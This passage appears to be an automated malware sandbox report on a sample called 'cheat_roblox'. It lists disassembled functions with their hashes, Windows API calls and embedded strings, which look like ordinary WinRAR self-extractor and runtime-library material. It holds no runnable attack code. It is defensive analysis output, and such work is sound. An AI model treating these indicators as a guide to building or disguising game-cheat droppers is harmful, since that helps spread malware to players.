                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                              • Instruction ID: a70ba6466bfe987b04910b1d1c482880b1e6c3710344367d63eba478da3eb871
                                                                              • Opcode Fuzzy Hash: 8137a9b05b05aada6fbcd6bbdda66db02b1ef4637fe403d2df7c72722ebbdea5
                                                                              • Instruction Fuzzy Hash: 90513673B191924BE7398F28D01A7BD3765FB90B48F448136DB4A9768ADE3DE541CB00
                                                                              Function 00007FF693E72AB0 Relevance: .1, Instructions: 112COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                              • Instruction ID: 78c02f33b673fddcb23f45138d621b8e7c7258e7bbc0e806c419e2c5164b3eb5
                                                                              • Opcode Fuzzy Hash: 525267a7f117e2089c634eae81b531c40420bccc1aa688f1dd99d62513960580
                                                                              • Instruction Fuzzy Hash: E431E6B2A185814BD728DE16D55267E77D5F784344F44813ADB4AD7B42DE3CE441CB00
                                                                              Function 00007FF693E958E0 Relevance: .0, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                              • Instruction ID: 11ec4b5ba474815fc6de0cd4f736eb41cb855a83d82218a0639a46f59d245560
                                                                              • Opcode Fuzzy Hash: 20052d42666034676028b01d15d2cffdefdd266dec7e2dd0f98b8d8f07818195
                                                                              • Instruction Fuzzy Hash: 2BF0687171C3A58BDBB58F29A44363977E5F708384F44807AE58DC7B14DA3C94618F04
                                                                              Function 00007FF693E83354 Relevance: .0, Instructions: 2COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                              • Instruction ID: ea6e72355e5d0c5927a6339d9f5874d967c62b999fafd7590ba046066ba184bd
                                                                              • Opcode Fuzzy Hash: e57e15d0ab639cfe726454a8769b7378f2b682ff734fe90589bfb13db1bf513a
                                                                              • Instruction Fuzzy Hash: BFA00265D0CC46E0E665CF11E8620702338FB54300B5400B3F01DE10B4DF3CB801C300
                                                                              Function 00007FF693E5D7D0 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                                                              • API String ID: 3668304517-727060406
                                                                              • Opcode ID: 68b0776e0b0472d89a3e33afb210e6886cf7e268cb4df9669c3e10123b671312
                                                                              • Instruction ID: 6739dbb812eba39a8a86a46f20b1797e657dc6ec5b81e55c01579e1d1f52329e
                                                                              • Opcode Fuzzy Hash: 68b0776e0b0472d89a3e33afb210e6886cf7e268cb4df9669c3e10123b671312
                                                                              • Instruction Fuzzy Hash: B441E536B15B0599EB208F64E4823E933A9EB48798F400277DA5CA3B69EF38D555C384
                                                                              Function 00007FF693E82A10 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                              • API String ID: 2565136772-3242537097
                                                                              • Opcode ID: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                              • Instruction ID: 78a80a0d847e43f0cf42775e16563e9b9d87a435c9f6f8de3b7c231ed66386d8
                                                                              • Opcode Fuzzy Hash: 6e1e709f092c3aabc6fb1c9db3d7c09c3ef1a4a7bf2af41e7ac9402dec2f511f
                                                                              • Instruction Fuzzy Hash: 9521EB68E19B4791FE75DF62E9971B423A8EF58B80F4405B7C91EE67A0DE3CA8458300
                                                                              Function 00007FF693E66A0C Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                              • String ID: DXGIDebug.dll$UNC$\\?\
                                                                              • API String ID: 4097890229-4048004291
                                                                              • Opcode ID: d9976f84b704906ab358d0cafcf19d1598e368cc093c64d80ce572062a6bb09c
                                                                              • Instruction ID: 2e927d4f0108a899c4ad39ba1619ceca842a4e97f94cfadf64dd21acbd644baf
                                                                              • Opcode Fuzzy Hash: d9976f84b704906ab358d0cafcf19d1598e368cc093c64d80ce572062a6bb09c
                                                                              • Instruction Fuzzy Hash: 0812DD22B18A4280EF20DF64D4421AD7379EB81B98F504276DB5DA7BE9DF3CE589C344
                                                                              Function 00007FF693E7A440 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                              • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                              • API String ID: 431506467-1315819833
                                                                              • Opcode ID: 2f46cc1a99c1f37a0c478ce60eb93dd31fe2b8eb42b17bb1256e0ee20edd3ce7
                                                                              • Instruction ID: b4c870c689caad5ab9f0e07fa97de53ed704c43d416b1181df2472d1faf49a9d
                                                                              • Opcode Fuzzy Hash: 2f46cc1a99c1f37a0c478ce60eb93dd31fe2b8eb42b17bb1256e0ee20edd3ce7
                                                                              • Instruction Fuzzy Hash: C3B1C062F1978685FB20CBA4D4462BC237AEB85394F404276DE1DB6BDADE3CE446C305
                                                                              Function 00007FF693E8E650 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                              • API String ID: 3215553584-2617248754
                                                                              • Opcode ID: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                              • Instruction ID: 3bb40e52ca05683753a2e9615fc62da3c40b95ccd21283455c70aa1b0fb1574f
                                                                              • Opcode Fuzzy Hash: ca8329083cbd7a022b2adefca7a3bb58d0ae1dff90efa4c28dbe4d3f14657870
                                                                              • Instruction Fuzzy Hash: D741BE76E09B4589E720DF25E8427ED33A8EB18398F014176EE4CA3B54DE3CD025C344
                                                                              Function 00007FF693E7F390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                              • String ID: STATIC
                                                                              • API String ID: 781704138-1882779555
                                                                              • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                              • Instruction ID: 1ccc54f28e1fce4db5cca4d04a8ccb5a82f1f6b12d6faeed23f558a10072a4b1
                                                                              • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                              • Instruction Fuzzy Hash: 6131B235B0C74286FA71DB12A5167B923A9FF88BD0F000472DD4EA7B56EE3CE8068740
                                                                              Function 00007FF693E76E80 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                                                              • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                              • API String ID: 2721297748-1533471033
                                                                              • Opcode ID: 1ea127eca2c18cb8a14940d765cc2bcbd285cf128bafe390cda2fc791a186282
                                                                              • Instruction ID: fb54298c05a28be1ed30aeddf9de4d6df0a37d7d99422bd9e52658e9c72c6a68
                                                                              • Opcode Fuzzy Hash: 1ea127eca2c18cb8a14940d765cc2bcbd285cf128bafe390cda2fc791a186282
                                                                              • Instruction Fuzzy Hash: 8E818E62F18A4685FB20DBA5D4422FD237AEB44798F404177DE1EB779AEE38D50AC304
                                                                              Function 00007FF693E7AE90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Item$Text
                                                                              • String ID: LICENSEDLG
                                                                              • API String ID: 1601838975-2177901306
                                                                              • Opcode ID: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                              • Instruction ID: d2b2afd6c64cfaf1a256e7077d9b8ab1708905de109819661c89fbc51313f428
                                                                              • Opcode Fuzzy Hash: 35fefc179f922e98870b8a3b257cf5e504c5ed53f195972dc606f5139ed8380b
                                                                              • Instruction Fuzzy Hash: B7419125E1C75282FB758B12F81677923A9EF84B80F1440B6D90EA7B96CF3CE5868305
                                                                              Function 00007FF693E6B9B4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                              • API String ID: 2915667086-2207617598
                                                                              • Opcode ID: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                              • Instruction ID: 7ac1a37c0099a0331a8dfd6d798eb5ff6a5540b78423f1794798d1f18f8c8651
                                                                              • Opcode Fuzzy Hash: 6794cfd2df2083ddb130d433e4ca33b69faefb70ddab7dfcfa84983386d80e8a
                                                                              • Instruction Fuzzy Hash: 65316628A09B0780FA358F13A9921793BAAFF44B94F0501B3DE5EE77A5DE3CE4418304
                                                                              Function 00007FF693E787D8 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID: $
                                                                              • API String ID: 3668304517-227171996
                                                                              • Opcode ID: 856ac1849cc905fc882b661309921a6190b36591fc688feaebdf3f8635206ba3
                                                                              • Instruction ID: 15a205677807dabde38ab0d70338b0b8c33da6d2b77ce225f14dc13a3d8a6ea4
                                                                              • Opcode Fuzzy Hash: 856ac1849cc905fc882b661309921a6190b36591fc688feaebdf3f8635206ba3
                                                                              • Instruction Fuzzy Hash: 7EF1D462F1474A80EF209B65D4471BC2369EB64BA8F505672CB6EA77D6DF7CE880C340
                                                                              Function 00007FF693E857EC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                              • String ID: csm$csm$csm
                                                                              • API String ID: 2940173790-393685449
                                                                              • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                              • Instruction ID: 1762ee173cf378e17fdaf8a4b6e4cf2e42bf2c1f8b7c066c4909186518d202a0
                                                                              • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                                                                              • Instruction Fuzzy Hash: BCE1A172E087828AE7309F64D4823AD7BB8FB45758F144176DA8DA7796DF38E485CB00
                                                                              Function 00007FF693E64F38 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AllocClearStringVariant
                                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                              • API String ID: 1959693985-3505469590
                                                                              • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                              • Instruction ID: eec16c3f9866ad45d5ca253fb6a031eee791c0e571610d103f8c476e0f9b8707
                                                                              • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                                                                              • Instruction Fuzzy Hash: A1713B36B14B0586EB20CF25E8815AD77B8FB88B98B045177EA4EA3BA4CF3CD544C740
                                                                              Function 00007FF693E872EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF693E874F3,?,?,?,00007FF693E8525E,?,?,?,00007FF693E85219), ref: 00007FF693E87371
                                                                              • GetLastError.KERNEL32(?,?,00000000,00007FF693E874F3,?,?,?,00007FF693E8525E,?,?,?,00007FF693E85219), ref: 00007FF693E8737F
                                                                              • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF693E874F3,?,?,?,00007FF693E8525E,?,?,?,00007FF693E85219), ref: 00007FF693E873A9
                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF693E874F3,?,?,?,00007FF693E8525E,?,?,?,00007FF693E85219), ref: 00007FF693E873EF
